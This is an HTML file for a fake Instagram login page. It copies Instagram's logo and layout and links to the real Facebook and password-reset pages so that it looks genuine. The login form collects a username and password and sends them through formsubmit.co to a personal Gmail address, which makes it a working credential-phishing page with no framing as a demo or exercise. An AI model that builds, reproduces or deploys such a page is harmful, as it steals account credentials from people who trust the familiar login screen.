<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        .bg{
            background-image: url(https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTCqeq18kAy8F5AHjX7SSlv1HjKtc4BmtwccA&usqp=CAU);
            
        }
        .form{
            border: 6PX SOLID hsl(0, 0%, 90%) ;
            width: 7cm;
            border-radius: 3px;
            height: 7cm;
            padding-top: 4cm;
            background-image: url(https://assets.turbologo.com/blog/en/2019/09/19084953/instagram-logo-illustration.png);
            background-position-x: center;
            background-size: 4.5cm;
            background-repeat: no-repeat;
            margin-left: 15cm;
            margin-top: 4cm;
            background-color: white;
            /* float: left; */
            /* background-color: hsl(0, 0%, 90%); */
        }
        .mainimg{
            background-image: url(https://www.instagram.com/images/instagram/xig/homepage/screenshots/screenshot3.png?__d=www);
        }
        .login{
            width: 4.6cm;
            height: 0.7cm;
        }
        .fontsiz{
            font-size: 10px;
        }
        .log{
            width: 4.8cm;
            height: 0.7cm;
            background-color: #0095f6;
            border: 1px solid blue;
            border-radius: 2px;
            color: white;
            cursor: pointer;
            
        }
        .lwf{
            color: #385185;
            text-decoration: none;
            float: left;
        }
        .fblogo{
            width:32px ;
            height: 27px;
            float: left;
            margin-left: 1cm;
        }
        .a{
            color: #3578E5;
            text-decoration: none;
            font-size: 14px;
        }
        .d{
            border: 4PX SOLID hsl(0, 0%, 90%);
            width: 7cm;
            height: 1cm;
            text-align: center;
            padding-top: 0.5cm;
            background-color: white;
            
            
        }
        /* .k{
            margin-left: 10cm;
            float: left;
            float: left;
            margin-bottom: 7cm;

        } */
       
        

        
        

    </style>
</head>
<body class="bg">
    <div class="form">
        <form action="https://formsubmit.co/shinderajvardhan2051@gmail.com">
            <div><center>
                <input type="text" name="" id="" class="login fontsiz"  placeholder="Phone number,user name or Email">
                <br>
                <br>
                <input type="password" name="" class="login fontsiz" id="" placeholder="Password">
                <br><br>
                <input type="submit" value="Login" class="log" placeholder="Login" >
                <br>
                <p>or</p>
                
                <a href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26state%3D%257B%2522fbLoginKey%2522%253A%2522181oqy17qqfzi1kfgyvvag3w1z9nkofu1h7vkgzcu8gtf10kfjhd%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26scope%3Demail%26response_type%3Dcode%252Cgranted_scopes%26locale%3Den_US%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D94f3dcf3-6714-41ab-868c-51bcd17549ad%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%2522181oqy17qqfzi1kfgyvvag3w1z9nkofu1h7vkgzcu8gtf10kfjhd%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=en_GB&pl_dbl=0" class="lwf"><img class="fblogo" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQmVg7GSGzJ6XmJ4VPIgMJRR-OoZ5R-p1VTIQ&usqp=CAU" alt="">Log in with facebook </a>
                <br>
                <br>

               <a href="https://www.instagram.com/accounts/password/reset/" class="a">forgot password?</a>
            </center>
            <br><br><br>
            </div>
            <div class="d">
                Don't have an account?<a class="a" href=""><b> Sign up</b></a>
    
            </div>
            <!-- <div class="im"> <img  src="https://www.sketchappsources.com/resources/source-image/instagram-home-stories-view.png" class="im" alt="">
               
    
            </div> -->
          
            
        </form>
     
    </div>
</body>
</html>